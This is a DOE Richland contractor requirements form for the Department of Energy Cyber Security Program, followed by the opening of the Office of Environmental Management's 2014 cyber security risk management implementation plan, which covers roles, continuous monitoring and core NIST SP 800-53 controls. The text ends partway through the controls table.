Contractor Requirements Document
(Supplemented) Form
DOE-RL-RIMS-RPMS-RM-Supplemented Contractor Requirements Document 1 of 1
CRD #: CRD O 205.1B, Chg. 2 (Supplemented
Revision 2)
Title: Department of Energy Cyber Security
Program
Applicable Contractor(s): RCC OccMed X PRC X MSC X Other X (TOC,ATL,BNI)
Section A – Headquarters CRD: DOE O 205.1B, Chg. 2, Attachment 1
Section B – General Clarifications: Headquarters DOE O 205.1B, Chg. 2, Attachment 1, item 1 reads:
“1. The contractor is responsible for assessing and managing risk within its environment, in the context of
acceptable mission risk set collaboratively with the Federal Site Manager.”
The “acceptable mission risk” (i.e. drivers for a site-specific cyber security risk approach) is to be included in
the Site Risk Management Approach document after consultation with the RL Authorizing Official and RL
Authorizing Official Designated Representatives.
Headquarters DOE O 205.1B, Chg. 2, Attachment 1, item #2 reads:
“2. The contractor must formally establish a Site Risk Management Approach (RMA) that is consistent with the
requirements of the applicable Senior DOE Management (SDM) RMA implementation plan.”
The “SDM RMA implementation plan” shall refer to the Office of Environmental Management (EM) Cyber Security Policy and Risk Management Approach Implementation Plan (attached). Headquarters DOE O 205.1B, Chg. 2, Attachment 1, item #4 reads:
“4. The contractor must establish and implement a configuration management approach. Where mission
appropriate, the approach must consider federally established configurations, such as the Federal Desktop
Core Configuration (FDCC) as an alternative.”
This approach must use Federally established configuration baselines where possible, be documented in the
system security plan, and be approved by the RL Authorizing Official.
Section C – Specific Clarifications:
MSC, OccMed, PRC, TOC, and ATL Because MSC, OccMed, PRC, and TOC all share the same network (Hanford Federal Cloud), MSC will have
the lead in developing a common authorization boundary (or boundaries) with associated security assessment
and authorization documentation. MSC will solicit input from the other organizations to incorporate their
organization specific requirements into supplemental system security plans.
Section D – General Supplemental Requirements None.
Section E - Specific Supplemental Requirements: None.
________________________________________________________________________
DOE EM RMAIP1 of 266
Office of Environmental Management (EM)Cyber Security Policy and
Risk Management Approach ImplementationPlan
February 2014
Office of Environmental ManagementU.S. Department of Energy
Washington, DC
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
3 of 266
Table of Contents
SCOPE........................................................................................................................................................... 5
APPENDICES .............................................................................................................................................. 5
REFERENCES ............................................................................................................................................. 6
INTRODUCTION ........................................................................................................................................ 6
AUTHORIZING OFFICIAL .............................................................................................................................11AUTHORIZING OFFICIAL DESIGNATED REPRESENTATIVE..............................................................................11EM CYBER SECURITY PROGRAM MANAGER .................................................................................................12RISK EXECUTIVE (RE) ................................................................................................................................12INFORMATION SYSTEM SECURITY MANAGER ................................................................................................13CERTIFICATION AGENT (CA).......................................................................................................................14INFORMATION SYSTEM SECURITY OFFICER (ISSO) ......................................................................................14INFORMATION TECHNOLOGY CONTINGENCY PLANNING DIRECTOR ..............................................................14DATABASE ADMINISTRATOR (DBA) .............................................................................................................15APPLICATION ADMINISTRATOR (AA)............................................................................................................15NETWORK DEVICE ADMINISTRATOR (NDA) .................................................................................................15CONTRACTING OFFICER (CO) ....................................................................................................................16
CORE CONTROLS ....................................................................................................................................17
PROGRAM MANAGEMENT CONTROLS............................................................................................20
EM CENTRAL REPOSITORY, EGOV RISK PORTFOLIO MANAGER (EGOV RPM) ................23
EM CM TEAM RESPONSIBILITIES FOR WORKING WITH EM SITES.......................................24
EM SITES CONTINUOUS MONITORING RESPONSIBILITIES......................................................25
INHERITED CONTROL GUIDANCE ....................................................................................................28
AO’S ANNUAL REAUTHORIZATION RESPONSIBILITIES............................................................28
NATIONAL SECURITY SYSTEMS ........................................................................................................28
FEDERAL INFORMATION SYSTEMS MANAGEMENT ACT OF 2002 ..........................................29
EM HQ MISSION INFORMATION PROTECTION PROGRAM (MIPP) SUPPORT ANDPARTICIPATION.......................................................................................................................................30
CONTINGENCY PLANNING ..................................................................................................................31
CONTRACTOR REQUIREMENTS, SYSTEM ACQUISITION AND SERVICES............................32
SUPPLY CHAIN RISK MANAGEMENT ...............................................................................................32
DOE’S ENHANCED CYBER SECURITY SERVICES (DEX)..............................................................33
MOBILE DEVICE GUIDELINES FOR FOREIGN TRAVEL..............................................................33
FOREIGN NATIONALS............................................................................................................................33
HSPD-12 REQUIREMENTS AND PROJECTED MILESTONES .......................................................34
IPV6 REQUIREMENTS AND PROJECTED MILESTONES...............................................................34
DOMAIN NAME SYSTEM SECURITY EXTENSIONS (DNSSEC) ....................................................35
INDUSTRIAL CONTROL SYSTEMS .....................................................................................................35
WIRELESS INFORMATION SYSTEMS................................................................................................35
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
4 of 266
CONTROLLED UNCLASSIFIED INFORMATION (CUI) PROTECTION.......................................36
APPENDIX A – NIST SP 800-53 REV 4 SECURITY CONTROLS AND GUIDANCE ......................37
APPENDIX B – NSS SECURITY CONTROLS...............................................................................149149
APPENDIX C – NIST SP 800-53 REV 4 CONTROL FAMILY POLICIES.................................242242
APPENDIX D – EM CONTRACTOR REQUIREMENTS.............................................................257257
ACRONYM LIST................................................................................................................................265265
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
5 of 266
Purpose
The purpose of this document is to implement the Department of Energy (DOE) RiskManagement Approach (RMA), as described in DOE O 205.1B, Chg.2, Department ofEnergy Cyber Security Program, within the Office of Environmental Management (EM).This document cancels the DOE Office of Environmental Management Program SecurityPlan, dated February 2009. This document is the Senior DOE Management (SDM)Cyber Security RMA Implementation Plan (IP) for EM Headquarters (HQ) and EM sites.
Scope
This RMAIP sets forth EM policy concerning cyber security requirements and providesEM sites with guidance and, where applicable, direction concerning specificrequirements. The requirements found in this document are in addition to therequirements set forth in National Institute of Standards and Technology (NIST) FederalInformation Processing Standards (FIPS)/Special Publications (SP), Committee onNational Security Systems (CNSS) and DOE O 205.1B, Chg.2. The latest versions ofNIST, FIPS and CNSS documents should be used in accordance with contractualrequirements. For the purposes of this document, the term “sites” includes EM HQ, sitesand facilities.
Applicability
This document applies to all EM sites and their respective information processingsystems, both government-owned and government owned/contractor-operated systems,that process, store, or communicate EM information/data. Field managers are to ensurethat contractor-developed Risk Management Approach documents required by DOE O205.1B, Chg 2, Attachment 1, meet the requirements of this RMAIP.
This document also applies to National Security Systems (NSS) operating on behalf of orlocated on EM sites that process, store, or communicate sensitive information (see NIST800-59 for determination of NSS systems). EM sites must use DOE O 205.1B, Chg.2,the most current versions of NIST SP 800 series specific to cyber security/accreditation,and CNSS Publications specific to the accreditation of NSS. The Office of CorporateInformation Technology, EM-72, has prepared Appendix B – NSS Security Controls, toassist the sites in system categorization and implementation of the CNSS securitycontrols. EM sites also must use the latest version of NIST SP 800-82 for securing theIndustrial Control Systems (ICS) that collect, process, or store data to support the EMmission.
Questions regarding this document should be directed to the EM Cyber Security ProgramManager (EM CSPM) at [email protected].
Appendices
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
6 of 266
Appendix A – NIST SP 800-53 Rev 3 Security Controls and GuidanceAppendix B – NSS Security ControlsAppendix C – Appendix C – NIST SP 800-53 Rev 3 -1 Control PoliciesAppendix D – EM Contractor RequirementsAppendix E – NIST 800-27 Rev A Engineering PrinciplesAppendix F – Sanitization and Disposal of Media and Mobile Devices
References
The most current versions of these documents are to be used by sites to secure IT systemsthat support the site missions.
1. Title III of the E-Government Act of 2002, entitled the Federal InformationSecurity Management Act (FISMA) of 2002
2. Office of Management and Budget (OMB) Circular A-130, Appendix III, 20003. DOE Order 205.1 B, Chg 2, DOE Cyber Security Management, May 20114. DOE Order 206.2, Identity, Credential, and Access Management, Feb 19, 20135. DOE 470.4-1B, chg.1, Safeguards and Security Program , July 20116. DOE Order 142.3A Unclassified Foreign Visits and Assignments Program,
October 14, 20107. FIPS 200, Minimum Security Requirements for Federal Information and
Information Systems, March 20068. FIPS 199, Standards for Security Categorization of Federal Information and
Information Systems, February 20049. NIST SP 800-18 (Feb 2006), 800-30 (Sept 2012), 800-34 (May 2010), 800-37
(Feb 2010), 800-40 (Sept 2012), 800-52 (2005), 800-53 (April 2013), 800-63 (Feb2013), 800-71, 800-73 (May 2013), 800-76 (July 2012), 800-78 (May 2013), 800-81 (April 2010), 800-82 (April 2013), 800-88 (Sept 2012), and 800-100 () (Oct2006)
10. Committee on National Security Systems (CNSS) 1253 (March 2012)
Introduction
EM information and information systems are critical to successful mission and businessoperations, and are dependent on the underlying information technology (IT)infrastructure. IT systems have become vital to performing and protecting the EMmission, assets, and personnel, and must be protected in a manner commensurate with theimpact to EM’s mission, acceptable risk levels, security requirements, and potentialmagnitude of harm. Disruption of IT systems can cause delays in achieving missionmilestones, productivity losses, loss of critical data, and can create data integrity issuesthat negatively impact mission success.
Secure IT solutions will enable EM to:
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
7 of 266
Be more efficient and productive in delivering IT services to meet or exceedcleanup milestones
Execute business operations that result in more waste shipments and lower life-cycle cost
Increase productivity Leverage secure and enhanced wireless services for more efficient waste
monitoring, processing, removal, inventory, and storage Decrease energy costs by producing greener IT services
As government IT systems continue to be the target of daily sophisticated securityattacks, signature-based protection programs, annual assessments and three-year staticcertification and accreditation (C&A) processes are no longer effective against thisadvanced persistent threat. Systems change, threats emerge, and sophisticated attacksoccur on a daily basis. Only active monitoring of security controls can prevent or addressthe detection, analysis, eradication, and timely incident response activities associatedwith these attacks.
FISMA requirements, OMB memorandums/policy, and NIST standards and guidelinesrequire a Continuous Monitoring (CM) approach for all Federal agency systems whetheroperated by federal or contractor staff. CM is the process required to constantly monitorthe security posture and risk levels of an accreditation boundary or system to makecertain that changes or successful attacks have not degraded the performance, affected thelevel of security controls, or created vulnerabilities in an IT system. The objective of aCM process is to determine if the complete set of planned, required, and deployedsecurity controls within an information system, or controls inherited by the system,continue to be effective and adequate over time. A key aspect of a correctly planned andexecuted CM process ensures that current security controls are adequate to mitigatenewly discovered threats, access or use violations, escalation of privileges, alteration ofconfigurations, loss of confidentiality, and changes in data integrity or availability. CMalso requires additional controls, above and beyond the NIST SP 800 series to bedeveloped and implemented to mitigate evolving threats. When tailoring controls, EMHQ and EM sites are encouraged to add controls specific to their site and mission thatmay not be identified in NIST documentation.
An effective CM process validates that security safeguards are implemented correctly,operating as intended and produces valid security results sufficient to protect the system.CM is used to stay abreast of malicious activity, evolving threats, and identifiedvulnerabilities to enable sound decision making. This means that sites are expected to beproactive in meeting these new threats, vulnerabilities, and attacks without waiting forcontractual changes in their respective contracts. It is also expected that federal andcontractor staff will take appropriate action, based on sound risk-management decisions,to mitigate the evolving threat. This includes updating hardware and software that isoutdated and unsupported by vendors, purchasing additional tools as technologyadvances, and mitigating any vulnerability due to technologic advancements. IT systemsmust evolve based on the threat. As hardware and software is updated or replaced, site ITstaff should use sound engineering principles, as identified in NIST 800-27 (as modified),
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
8 of 266
while conducting daily tasks. Appendix E is provided as guidance for sites concerningengineering principles as they apply to IT systems.A key component of CM is the continuous assessment of risk and the deployment ofcontrols in a timely manner to mitigate the risk to an acceptable level. The Department’sRMA, as documented in DOE O 205.1B, Chg 2, governs the continuous assessment ofrisk. EM sites must use the six steps of the Risk Management Framework (RMF),including a full Security Test and Evaluation (ST&E) for Authority to Operate (ATO), asrequired by FISMA and addressed in NIST SP 800 series documents for initialaccreditation of a system and to protect DOE information systems and data(categorization, selection of security controls, implementation of controls, assessment ofthe security controls, system authorization to operate and continuous monitoring).Currently, all EM systems have an ATO and have varying reauthorization dates. Systemscurrently authorized to operate must follow the Department’s RMA, CM, and ContinuousAuthorization to Operate (CAO) instructions outlined in this document.
Cloud computing must use the Federal Risk and Authorization Management Program(FedRAMP) select controls for accreditation if providing cloud services to otherprogrammatic elements or federal agencies. Cloud services that are purchased must usethe FedRAMP services to ensure that they are accredited to federal standards. Purchaseagreements must contain appropriate language to ensure that the provider of service isFedRAMP accredited.
At the end of the CM year, the accumulation of scan results, verified data documents,updated Risk Assessment (RA), and Plan of Action and Milestones (POA&M) will allowthe Authorizing Official (AO) to make a risk-based decision on the system’s ATO. TheCM year begins the day the ATO is signed by the AO.
The CM process outlined in this document moves EM sites from a document intensiveand three-year certification process to a more proactive, less laborious, and less expensiveCM process which will result in a risk-based decision annually regarding the ATO of thesystem(s). This RMAIP will be periodically updated and revised to reflect new andongoing cyber security risks and issues, as well as changes to national policy,Departmental policy, and other security guidance.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
9 of 266
Department of Energy Risk Management Approach (RMA)
For systems that are currently operational and have an ATO, the Department’s RMA (seeFig 1) is a four-step process used in the assessment of risk during step 6 (see Fig. 2) ofthe NIST Risk Management Framework (RMF). The RMA integrates into the NISTRMF, a six-step process that addresses the life-cycle of an information system. Thesetwo concepts are to be used in the management of risk for all EM IT systems. The firstthree steps of the RMA integrate into RMF step 2 (select security controls) and RMF step3, (the implementation of controls), when authorizing a new system (see Fig. 2). Step 4of the RMA is to be used in concert with and replaces RMF step 6, (see Fig. 2). TheRMA specifically calls out the stakeholders that should be involved in the riskdetermination and mitigation process.
The RMA deals mainly with the identification, monitoring, and management of riskbased on mission needs. All operational and accredited systems should be in the CM stepof the RMF. New systems, not yet accredited or approved for operation by the AO, mustundergo the entire six-step RMF and four-step RMA before they are allowed to operate,unless given temporary and conditional authorization by the AO. If mission dictates thata system must become operational, the AO has the authority to grant conditionalauthorization to operate prior to a full certification of the system. The four-step RMA isto be used to assess risk when major changes in the system, threat, or risk are identifiedfor all systems operating with a current ATO. For systems that are already operational,the four-step RMA is used to assess risk and to make risk-based decisions for futureATOs.
In order to accomplish the assessment of risk, a Business Impact Assessment (BIA) mustbe conducted. Each system must have a current BIA on file, or be identified in a BIA forthe site network, with the authorization documentation. The BIA must be completed withinput from the business stakeholders, IT staff, and system owners. A single BIA for anentire network, regardless of the number of authorized boundaries, is an acceptableapproach.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
10 of 266
Figure 1
Figure 2
DOE Risk Management Approach (RMA) Process
DOE Department RMA
Senior DOE Management (SDM) Cyber Security RMA Implementation Plans (IP)
Inputs Approved cyber
security protections Risk Management
Strategy
Step 4: Risk MonitoringInvolves
Federal Site Manager Senior Site Manager Authorizing Official
Activities Risk monitoring strategy Risk monitoring Contractor assurance
Federal oversight
Inputs Threat Statements Risk Response Risk Monitoring
Step 1: Risk FramingInvolves
SDM & Federal Site Manager Senior Site Manager Authorizing Official
Activities Establish risk assumptions,
constraints, & tolerance
ID priorities & trade-offs
Outputs Cyber security
effectivenessevaluation
RMA processassessment
Outputs Risk Management
Strategycommunicated toAO and Site CIO
Inputs Risk Assessment SDM RMA IP NIST Requirements
& Guides
Step 3: Risk ResponseInvolves Authorizing Official Site CIO
Activities ID and evaluate risk response
alternatives Determine appropriate risk response Implement cyber security
protections
Inputs SDM RMA IP Risk Response Risk Monitoring
Step 2: Risk AssessmentInvolves Authorizing Official Site CIO
Activities ID threats and vulnerabilities
Determine risk in context of missionOutputs
Approved &implemented cybersecurity protections
Outputs Risk Determination Residual Risk Resource
Requirements
Communications
How the RMF and RMA work together for EM
PROCESS
OVERVIEW
StartingPoint
Architecture DescriptionArchitecture Reference Models
Segment and Solution ArchitecturesMission and Business ProcessesInformation System Boundaries
Organizational InputsLaws, Directives, Policy Guidance
Strategic Goals and ObjectivesPriorities and Resource Availability
Supply Chain Considerations
Step 4
ASSESSSecurity Controls
Step 6
MONITOR
Security Controls
Step 3
IMPLEMENTSecurity Controls
Repeat as necessaryStep 1
CATEGORIZEInformation System Step 2
SELECT
Security Controls
Step 5
AUTHORIZEInformation System
RISK
MANAGEMENT
FRAMEWORKRMA Step 3
RiskResponse
RMA Step 4Risk
Monitoring
RMA Step 1Risk Framing
RMA Step 2Risk
Assessment
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
11 of 266
Roles and Responsibilities
This section describes the roles and responsibilities of key participants involved in anorganization’s CM process. Recognizing that staffing is a concern, care must be taken toensure separation of duties is adhered to when appointing these roles. One individualmay perform multiple roles as long as an insider threat vulnerability is not created. Aninsider threat may be presented by a malicious user who has approved access to EMinformation and information systems and who can use that access to cause damage orsteal sensitive information and system components. The key participants and theirresponsibilities are described below.
Authorizing Official
1. Must be a federal employee appointed in writing by the Assistant Secretary forEM.
2. Ensures that the requirements of the RMAIP are implemented.3. Accepts risk for the operation of an IT system.4. Directly appoints, in writing, a federal employee as the AO Designated
Representative (AODR).5. Furnishes a copy of the appointment letter for the AODR to the Cyber Security
Program Manager at EM Headquarters as well as the site Information SystemSecurity Manager (ISSM) within 60 days of appointment.
6. Appoints a new or Acting AODR in the event of personnel turnover or extendedabsence of the AODR. An appointment letter for a new or Acting AODR must bedisseminated within twenty one (21) business days of the departure of theprevious AODR.
7. Ensures direct access to the AODR for all cyber security matters.8. Receives, at least quarterly, a formal cyber security status briefing directly from
the AODR.9. Ensures that personnel are appointed, in writing, to the roles of System Owner,
ISSM, Information System Security Officer (ISSO), and Information TechnologyContingency Planning Director.
Authorizing Official Designated Representative
1. Must be a federal employee appointed in writing by the AO.2. Acts on behalf of the AO (e.g., hold meetings, review SSPs, determine major vs.
minor changes) as specified in the appointment letter.3. Acts for the AO, but cannot formally accept risk to operate any system.4. Maintains continual awareness of the cyber security posture of the AO’s area of
responsibility, in coordination with the ISSM and other individuals as necessary.5. Coordinates the formal written appointments of the System Owner, ISSM, ISSO,
and IT Contingency Planning Director with the AO and other appropriate site-level management personnel.
6. Develops and presents a formal cyber security status briefing to the AO on aquarterly basis, or more frequently at the AO’s request.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
12 of 266
EM Cyber Security Program Manager
1. Must be a federal employee located at EM HQ with cyber security responsibilitiesfor the EM IT enterprise.
2. Maintains the RMAIP so that it remains consistent with the DOE RMA and withcurrent federal cyber security policies.
3. Conducts cyber security oversight for the enterprise.4. Justifies the need for and coordinates the implementation of standard solutions for
cyber security concerns across the enterprise.5. Delivers quarterly and annual FISMA reports and responds to all OMB and Chief
Information Officer (CIO) data calls.
Risk Executive (RE)
The RE is a function performed by an individual or group within an organization thathelps to ensure that: (1) risk-related considerations for individual informationsystems, to include authorization decisions, are viewed from an organization-wideperspective with regard to the overall strategic goals and objectives of theorganization in carrying out its core missions and business functions; and (2)management of information system-related security risk is consistent across anorganization, reflects organizational risk tolerance, and is considered along with othertypes of risks in order to ensure mission/business success. A group may becomprised of federal staff and contractors but must be led by a federal employee. TheRE coordinates with the senior leadership of an organization to:
1. Provide a comprehensive, organization-wide, holistic approach for addressingrisk—an approach that provides a greater understanding of the integratedoperations of the organization.
2. Develop a risk management strategy for the organization providing a strategicview of information security-related risks with regard to the organization as awhole.
3. Facilitate the sharing of risk-related information among authorizing officials andother senior leaders within the organization.
4. Provide oversight for all risk management-related activities across theorganization (e.g., security categorizations) to help ensure consistent and effectiverisk acceptance decisions.
5. Ensure that authorization decisions consider all factors necessary for mission andbusiness success.
6. Provide an organization-wide forum to consider all sources of risk (includingaggregated risk) to organizational operations and assets, individuals, otherorganizations and the Nation.
7. Promote cooperation and collaboration among authorizing officials to includeauthorization actions requiring shared responsibility.
8. Ensure that the shared responsibility for supporting organizationalmission/business functions using external providers of information and servicesreceives the needed visibility and is elevated to the appropriate decision-makingauthorities.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
13 of 266
9. Identify the organizational risk posture based on the aggregated risk toinformation from the operation and use of the information systems for which theorganization is responsible.
The RE does not require a specific organizational structure and can be assigned to anyone individual or group within the organization. The head of the agency/organizationmay choose to retain the RE function or to delegate the function to another official orgroup (e.g., an executive leadership council). The AO must appoint a RE for eachsystem.
System Owner
The System Owner may be a federal or contractor employee that directly supportscontingency planning activities described in the RMAIP Contingency Planningsection. The System Owner:
1. Identifies appropriate personnel to serve on teams to perform the recovery andreconstitution activities described in each site’s IT Contingency Plan.
2. Ensures that recovery and reconstitution team members receive appropriateannual training.
3. Meets with the IT Contingency Planning Director on a quarterly basis to reviewteam assignments and readiness.
4. Participates in the BIA process.5. Prepares a business continuity of operation plan for use in the event that a long
network outage is observed.
Information System Security Manager
1. The ISSM can be a contractor or federal employee appointed, in writing, by sitemanagement. The ISSM for each EM field site can be a federal employeecharged with the management responsibility for system security or the contractoremployee that reports to the federal employee charged with the managementresponsibility for system security.
2. The ISSM’s area of responsibility and authority is site-wide in scope and includesboth EM federally-owned systems as well as contractor systems which store orprocess EM-owned data.
3. The ISSM maintains appointment letters for personnel in the ISSM’s area ofresponsibility.
4. The ISSM is responsible for disseminating the RMAIP to all personnel (includingcontractors) in the ISSM’s area of responsibility.
5. The ISSM cannot perform the role of Certification Agent (CA) for accreditationboundaries where the ISSM has management authority over the ISSO or otherpersonnel (such as contractors) developing C&A documentation. The CA’s rolemust be performed by an independent party.
6. The ISSM ensures that at least one database administrator (DBA), applicationadministrator (AA) or network device administrator (NDA) attends an annual
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
14 of 266
security training class, conference, or workshop. An example may include theInformation Management Conference (IMC) or a SANS training event. Thatindividual is responsible for bringing the information back to the site fordissemination to all appropriate personnel.
Certification Agent (CA)
1. The CA may consist of federal employees or contractors.2. The CA is an individual or group that has complete management independence
from the personnel that developed the C&A documentation being certified.3. The CA conducts a comprehensive evaluation of the security controls employed
within or inherited by an information system to determine the overalleffectiveness.
4. The CA recommends corrective actions to address identified vulnerabilities.5. The CA writes the Security Assessment Report (SAR) and presents it to the AO.
The AO has discretion to accept or mitigate any vulnerability found in the SAR.
Information System Security Officer (ISSO)
1. The ISSO is the primary individual responsible for the day-to-day operation,coordination and execution of security functions, C&A, and all CM activities. Aproperly cleared and qualified contractor may hold this role. The ISSOcoordinates the identification and appointment of Project Security Officers (PSO)with the ISSM and other management officials.
2. The ISSO directly participates in configuration management oversight proceduresrelevant to the accreditation boundaries that the ISSO oversees.
3. The ISSO meets with the ISSM and PSOs, at minimum, twice per month.4. The ISSO disseminates the RMAIP to all PSOs within their accreditation
boundaries.
Information Technology Contingency Planning Director
1. The IT Contingency Planning Director is appointed at EM field sites by theAODR. A qualified contractor or federal employee with the proper securityclearance may hold this role.
2. The IT Contingency Planning Director analyzes and notifies the system owner,ISSM, and other appropriate management personnel of any staffing needsnecessary to perform the recovery and reconstitution activities described in eachsite’s Contingency Plan and Project Managers Contingency Plans.
3. The IT Contingency Planning Director meets with system owners on a quarterlybasis to review staffing assignments, contingency plan update status, integrationwith business continuity of operation or contingency plans, contingency plantesting status, contingency planning POA&Ms remediation status, and any othermatters related to contingency planning.
4. The IT Contingency Planning Director documents a test of the Contingency Planat least annually. Actual documented use of the Contingency Plan (e.g., inresponding to an actual event) may substitute for such a test.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
15 of 266
Database Administrator (DBA)
1. A DBA may be a federal or contractor employee.2. The DBA is responsible for performing administratively-privileged functions on a
relational database software product. Privileged functions include but are notlimited to configuring database startup parameters, adding and deleting database-level user IDs, granting and revoking rights for users, and creating or modifyingtable space definitions. A contractor may hold this role with the proper securityclearances and background.
3. At least one DBA must attend annual security training such as a SANS trainingevent or the DOE IMC; that individual is responsible for bringing the informationback to the site for dissemination to all appropriate personnel.
4. The DBA implements patching requirements on database software products.5. The DBA implements password management requirements on database software
products.6. The DBA implements the audit logging requirements on database software
products.
Application Administrator (AA)
1. A AA may be a federal or contractor employee.2. The AA is responsible for performing privileged functions in a web-based
software application, client-server application, electronic mail server, or othertype of application server. Privileged functions include but are not limited toconfiguring application startup parameters, adding and deleting application userIDs, and granting and revoking folder/workspace permissions for users. Acontractor may hold this role with the proper security clearances and background.
3. At least one AA must attend annual security training such as the DOE IMC or aSANS training event. That individual is responsible for bringing the informationback to the site for dissemination to all appropriate personnel.
4. The AA implements patching requirements on applicable software applications.5. The AA implements password management requirements on applicable software
applications.
Network Device Administrator (NDA)
1. A NDA may be a federal or contractor employee.2. The NDA is responsible for performing privileged functions on network
infrastructure equipment such as switches, routers, firewalls, remote accessequipment, virtual private networking (VPN) equipment and wide areanetworking (WAN) equipment hereafter referred to as “network devices.” Acontractor may hold this role with the proper security clearances and background.
3. At least one NDA must attend annual security training such as the DOE IMC or aSANS training event. That individual is responsible for bringing the informationback to the site for dissemination to all appropriate personnel.
4. The NDA implements patching requirements on network devices.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
16 of 266
5. The NDA implements password management requirements on network devices.6. The NDA implements audit logging requirements on network devices.
Contracting Officer (CO)
The CO is a federal employee. The CO ensures the RMAIP is incorporated in EM contracts. The CO ensures that fee awards consider Cyber Security Performance; see
Appendix D for guidance. Cyber Security performance must be considered when calculating fee in all fee
based contracts. Fee should not be affected due to an intrusion into a network or system by an
outside entity, but should be negatively affected if sites do not report thoseincidents in a timely fashion and in accordance with the DOE Joint Cyber securityCoordination Center (JC3) guidance. All intrusions are not preventable; thereforeearly detection should be rewarded.
The CO works with local IT staff to determine metrics and measure performance. The CO ensures that the EM HQ CSPM has input to fee decisions; based on
contractor cooperation in the deployment of HQ EM-provided tools during siteassessments.
The CO incentivizes contractors to work together, partner, and share IT solutionsand infrastructure to save energy and funding through efficiencies andconsolidation where it makes sense.
General Instructions for Continuous Monitoring
Unless otherwise superseded by statute or other Federal policy, directive or guidance, allEM sites must use the instructions in DOE O 205.1B, Chg 2, and this RMAIP (or latestauthorized version) to comply with security requirements in defining the riskmanagement processes and mission-adjusted minimum security control baselinerequirements necessary for ensuring the protection of unclassified and classifiedinformation systems, commensurate with risk and mission needs.
The objective of the RMAIP is to improve EM’s organizational protection of informationsystems and data. All EM systems/accreditation boundaries have some level ofsensitivity and require protection as part of a good risk management framework practice.The protection of a system must be documented in a site’s accreditation boundary SystemSecurity Plan (SSP). The SSP must contain the systems categorization, systemdescription, a high level diagram, subsystems, review of security requirements,monitoring strategy, security controls provided by any hosted software (majorapplication), implemented controls with an implementation description, controls tailoredout and justification, and accepted risk due to the tailoring process. Security plans arerequired to be reviewed and updated within eGov Risk Portfolio Manager™ (eGov RPM)at least annually. The role of e-Gov RPM is discussed below.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
17 of 266
The AO for each EM accreditation boundary or site working in conjunction with the EMCSPM is responsible for adequately ensuring the confidentiality, integrity, andavailability of EM information systems/data and that the systems are operated inaccordance with CNSS NIST/DOE policies and directives.
Senior DOE management, the Federal Site Manager, the contractor’s senior IT manager,and the Site IT Director must annually conduct or review an Organization ImpactAssessment/BIA and perform a system risk assessment to determine the acceptable levelof risk for an accreditation boundary. These assessments will also be used to determine a“mission-adjusted minimum security controls baseline” for a sites’ system(s). Theseassessments must be performed for unclassified and classified systems. Performing theassessments will provide the necessary information for the AO to determine the correcttailoring of mission minimum security baseline controls for ATO decisions and CMplanning and execution.
The RE, AO, ISSM, ISSO, and site program offices must participate and agree on theorganization risk assessments, system categorization level, and the correct selection ofmission baseline security controls to be implemented on the accreditation boundary orsystem. The EM CSPM is available during these processes as required.
A senior-level federal employee must hold the AO function and responsibility. This isessential to ensure that the individual has an overall understanding of budgetary, missionoperation, and the organizational requirements of the accreditation boundary, as well asthe authority to make decisions concerning such systems.
The site AO is responsible for acceptance of the tailoring of security controls and thedecision to not implement a security control. Tailoring decisions must be documented inthe SSP with a justification and documentation of any resulting vulnerability or elevatedsecurity risk incurred. The site AO can also elect to implement a compensating(equivalent) security control provided it affords the same protection as the replacedcontrol and provides an acceptable level of risk. The use of compensating controlsshould be documented in the SSP.
The mission-adjusted baseline security controls must be implemented, tested, anddocumented in an SSP. Sites must perform CM on mission-adjusted minimum securitycontrol baselines. eGov RPM must be used to build SSPs and POA&Ms. All CMartifacts such as ATOs, audit reports, scan results, incident reports, contingency plans,and other security documents must be uploaded to eGov RPM.
Core Controls
Core controls must be implemented and must not be tailored out unless a waiver isrequested from and granted by the EM CSPM for any core control that is notimplemented. Core controls are listed in the table below.
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
18 of 266
Table 1.
Cntl.#
En
ha
nce
me
nt
#
# - Control Name NIST SP 800-53 Control Requirements
1.AC-5 0 A Separation of Duties
The organization: Separates [Assignment:organization-defined duties of individuals];
2. AC-6 0 Least Privilege
The organization employs the concept ofleast privilege, allowing only authorizedaccesses for users (and processes actingon behalf of users) which are necessary toaccomplish assigned tasks in accordancewith organizational missions and businessfunctions.
3.
AC-8 0 A1
System Use Notification
The information system: Displays to users[Assignment: organization-defined system usenotification message or banner] beforegranting access to the system that providesprivacy and security notices consistent withapplicable federal laws, Executive Orders,directives, policies, regulations, standards,and guidance and states that: Users areaccessing a U.S. Government informationsystem;
4.AU-6 0 a
Audit Review, Analysis,and Reporting
The organization: Reviews and analyzesinformation system audit records[Assignment: organization-defined frequency]for indications of [Assignment: organization-defined inappropriate or unusual activity]; and
5. CA-5 0 aPlan of Action and
Milestones
The organization: Develops a plan of actionand milestones for the information system todocument the organization’s planned remedialactions to correct weaknesses or deficienciesnoted during the assessment of the securitycontrols and to reduce or eliminate knownvulnerabilities in the system; and
6.CM-
20 Baseline Configuration
The organization develops, documents, andmaintains under configuration control, acurrent baseline configuration of theinformation system.
7.
CM-3
b -Configuration Change
Control
The organization: Reviews proposedconfiguration-controlled changes to theinformation system and approves ordisapproves such changes with explicitconsideration for security impact analyses;
8.CM-
71 a Least Functionality
The organization: Reviews the informationsystem [Assignment: organization-definedfrequency] to identify unnecessary and/ornonsecure functions, ports, protocols, andservices; and
________________________________________________________________________
________________________________________________________________________DOE EM RMAIP
19 of 266
Cntl.#
En
ha
nce
me
nt
## - Control Name NIST SP 800-53 Control Requirements
9.
CP-4 0 aContingency Plan Testing
and Exercises
The Organization Tests the contingency planfor the information system [Assignment:organization-defined frequency] using[Assignment: organization-defined tests] todetermine the effectiveness of the plan and theorganizational readiness to execute the plan;
10.IA-2 1
Identification andAuthentication
(Organizational Users)
The information system uses multifactorauthentication for network access toprivileged accounts.
11.IA-2 2
Identification andAuthentication
(Organizational Users)
